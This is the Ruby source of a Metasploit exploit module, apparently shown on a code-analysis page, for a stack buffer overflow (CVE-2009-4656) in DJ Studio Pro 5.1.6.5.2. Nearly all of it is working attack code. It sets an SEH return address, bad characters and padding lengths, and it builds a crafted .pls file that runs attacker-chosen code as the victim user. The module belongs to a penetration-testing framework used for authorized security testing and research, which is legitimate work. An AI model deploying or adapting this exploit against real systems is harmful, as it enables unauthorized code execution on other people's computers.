rapid7/metasploit-framework

View on GitHub
modules/exploits/windows/fileformat/djstudio_pls_bof.rb

Summary

Maintainability
A
3 hrs
Test Coverage
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DJ Studio Pro 5.1 .pls Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow in DJ Studio Pro 5.1.6.5.2.
        When handling a .pls file, DJ Studio will copy the user-supplied data on the stack
        without any proper bounds checking done beforehand, therefore allowing code
        execution under the context of the user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Sebastien Duquette',
          'Death-Shadow-Dark <death.shadow.dark[at]gmail.com>',
        ],
      'References'     =>
        [
          [ 'CVE', '2009-4656'],
          [ 'OSVDB', '58159'],
          [ 'EDB', '10827' ]
        ],
      'Payload'        =>
        {
          'Space'    => 5000,
          'BadChars' => "\x00\x0a\x3d",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets'        =>
        [
          # POP EBX # POP ECX # RET 8
          # DJStudioPro.exe
          [ 'DJ Studio Pro 5.1.6.5.2', { 'Ret' => 0x014FC62D } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2009-12-30',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('FILENAME', [ true, 'The file name.',  'msf.pls']),
        ])

  end

  def exploit

    sploit = rand_text_alpha_upper(1308)
    sploit << generate_seh_payload(target.ret)
    sploit << rand_text_alpha_upper(10000)

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    file_create(sploit)

  end
end